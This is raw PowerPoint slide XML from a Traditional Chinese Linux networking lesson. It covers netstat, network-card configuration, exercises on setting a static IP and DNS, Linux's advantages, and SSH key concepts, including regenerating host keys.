              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  –an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>列出目前的路由表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Port)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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顯示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en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>列出目前已經啟動的網路服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tulnp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025640" y="4284720"/>
              <a:ext cx="6636240" cy="1375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9440" y="4221000"/>
                <a:ext cx="6668280" cy="26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672840" y="4682880"/>
              <a:ext cx="3390120" cy="124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7000" y="4619520"/>
                <a:ext cx="3421800" cy="2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102480" y="2684520"/>
              <a:ext cx="62100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86640" y="2620800"/>
                <a:ext cx="6526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404360" y="3664080"/>
              <a:ext cx="1189080" cy="266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388520" y="3600720"/>
                <a:ext cx="12207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410200" y="3644640"/>
              <a:ext cx="764640" cy="327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94360" y="3580920"/>
                <a:ext cx="796320" cy="160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6266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網卡組態資料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HCP Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定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59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190" y="2294434"/>
            <a:ext cx="6324600" cy="152400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4293096"/>
            <a:ext cx="6915869" cy="1760101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827584" y="1769694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修改網卡組態資料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303725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的優缺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穩定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>免費或少許</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>費用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>發展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GPL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>宣言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>性、漏洞快速修補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opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>維護</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>多工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、多使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>允許多人同時使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與群組規劃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>區分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>種屬性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>整合度佳且多樣的圖形介面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(GUI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>沒有特定支援廠商</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專業軟體支援度不足與入門門檻高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71640" y="3295800"/>
              <a:ext cx="2578320" cy="1209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55800" y="3232080"/>
                <a:ext cx="261000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939960" y="3924360"/>
              <a:ext cx="2876760" cy="1274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23760" y="3860640"/>
                <a:ext cx="290880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317840" y="3930480"/>
              <a:ext cx="1791360" cy="114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02000" y="3867120"/>
                <a:ext cx="182304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800600" y="3301920"/>
              <a:ext cx="2108520" cy="45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84760" y="3238560"/>
                <a:ext cx="21402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882880" y="596880"/>
              <a:ext cx="3867480" cy="82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67040" y="533520"/>
                <a:ext cx="389916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028880" y="2786040"/>
              <a:ext cx="3757680" cy="144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12680" y="2722320"/>
                <a:ext cx="378972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186520" y="2786040"/>
              <a:ext cx="187884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170320" y="2722320"/>
                <a:ext cx="1911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236040" y="1542960"/>
              <a:ext cx="158652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220200" y="1479600"/>
                <a:ext cx="1618200" cy="127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3795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289" y="1830414"/>
            <a:ext cx="6185991" cy="469493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修改網卡組態資料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vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/network-scripts/ifcfg-eth0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906289" y="1991977"/>
            <a:ext cx="5030418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TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自動取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP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06289" y="2928081"/>
            <a:ext cx="5025212" cy="18722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TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>手動設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP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0</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904837" y="4917109"/>
            <a:ext cx="24657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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PS.“#” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表示為註解不執行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4127760" y="2521080"/>
              <a:ext cx="1541880" cy="331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11920" y="2457720"/>
                <a:ext cx="157356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" name="筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="960120" y="2246760"/>
              <a:ext cx="2567160" cy="85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44280" y="2183400"/>
                <a:ext cx="259884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" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="862200" y="3213360"/>
              <a:ext cx="3115800" cy="525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46360" y="3150000"/>
                <a:ext cx="314748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" name="筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4095360" y="3807720"/>
              <a:ext cx="2305800" cy="78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079520" y="3744360"/>
                <a:ext cx="2337480" cy="205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997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 smtClean="0"/>
              <a:t>請顯示主機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定網卡組態為手動設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP+60(192.168.11.33&gt;192.168.11.93)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重新啟動網卡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>請設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>jtalearn.mil.tw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>請</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檢視目前主機網路連線狀況</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請檢視目前主機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>沒有使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port 21</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200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9630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(Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>SHell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (Port:22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>非對稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統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公</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鑰與私鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Public and Private Key) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>公鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(public key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：提供給遠端主機進行資料加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>行為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>大家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>都能取得你的公鑰來將資料加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>密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1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>私鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(private key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：遠端主機使用你的公鑰加密的資料，在本地端就能夠使用私鑰來進行解密。由於私</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>很</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重要，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>私鑰是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>不外流！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>只</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>能在自己主機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>上。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/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6211440" y="1593720"/>
              <a:ext cx="1384920" cy="918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95600" y="1530000"/>
                <a:ext cx="141660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770120" y="2103120"/>
              <a:ext cx="2527920" cy="1047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54280" y="2039760"/>
                <a:ext cx="255960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378080" y="3206880"/>
              <a:ext cx="523080" cy="133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62240" y="3143520"/>
                <a:ext cx="55476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304160" y="3213360"/>
              <a:ext cx="2404080" cy="460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288320" y="3150000"/>
                <a:ext cx="24357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583040" y="3239640"/>
              <a:ext cx="1221840" cy="13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567200" y="3175920"/>
                <a:ext cx="125352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260720" y="3611880"/>
              <a:ext cx="24192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44880" y="3548520"/>
                <a:ext cx="2736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345680" y="4611240"/>
              <a:ext cx="2410200" cy="133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29480" y="4547520"/>
                <a:ext cx="244224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096000" y="5042160"/>
              <a:ext cx="1267560" cy="26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080160" y="4978800"/>
                <a:ext cx="129924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604120" y="5029200"/>
              <a:ext cx="135216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588280" y="4965840"/>
                <a:ext cx="13838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8164440" y="5061960"/>
              <a:ext cx="451080" cy="68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148600" y="4998240"/>
                <a:ext cx="482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319400" y="5421240"/>
              <a:ext cx="52956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303560" y="5357520"/>
                <a:ext cx="561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5708520" y="5479920"/>
              <a:ext cx="601200" cy="198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5692680" y="5416200"/>
                <a:ext cx="63288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6786360" y="5460120"/>
              <a:ext cx="927720" cy="266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770160" y="5396760"/>
                <a:ext cx="9597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8144640" y="5440680"/>
              <a:ext cx="536040" cy="198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8128800" y="5377320"/>
                <a:ext cx="5677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1802880" y="5878440"/>
              <a:ext cx="1672200" cy="392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786680" y="5814720"/>
                <a:ext cx="170424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3128760" y="3670560"/>
              <a:ext cx="359280" cy="201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112560" y="3607200"/>
                <a:ext cx="3913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4578480" y="3664080"/>
              <a:ext cx="359640" cy="36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4562640" y="3600720"/>
                <a:ext cx="3913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5995800" y="3677040"/>
              <a:ext cx="686160" cy="1368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5979960" y="3613680"/>
                <a:ext cx="7178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7321680" y="3683880"/>
              <a:ext cx="986760" cy="327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7305840" y="3620160"/>
                <a:ext cx="10184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1358640" y="4101840"/>
              <a:ext cx="379080" cy="3960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342800" y="4038120"/>
                <a:ext cx="410760" cy="166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7718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(Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>SHell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (Port:22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/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3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916832"/>
            <a:ext cx="5730627" cy="170058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16" y="3860079"/>
            <a:ext cx="5787575" cy="2457151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2339752" y="6299446"/>
            <a:ext cx="3435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b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>伺服器端與用戶端的連線步驟示意圖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2291625" y="3617420"/>
            <a:ext cx="35958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b="1" dirty="0"/>
              <a:t>公鑰與私鑰在進行資料傳輸時的角色示意圖</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226370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預防若密碼攻擊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>原有伺服器端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>公鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>私鑰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啟動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務並產生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的公</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與私</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鑰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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dirty="0"/>
              <a:t>產生新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>公鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與私鑰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4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0649582"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="683568" y="3068960"/>
          <a:ext cx="7776864" cy="2808312"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7776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08312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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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@www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~]# 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rm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 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ssh_host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*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r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>&lt;==</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>刪除金鑰檔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altLang="zh-TW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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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@www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~]# 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init.d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sshd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 restart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zh-TW" altLang="en-US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正在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停止 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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d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: [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確定 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]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zh-TW" altLang="en-US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正在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產生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1 RSA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主機金鑰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: [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確定 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] </a:t>
                      </a:r>
                      <a:r>
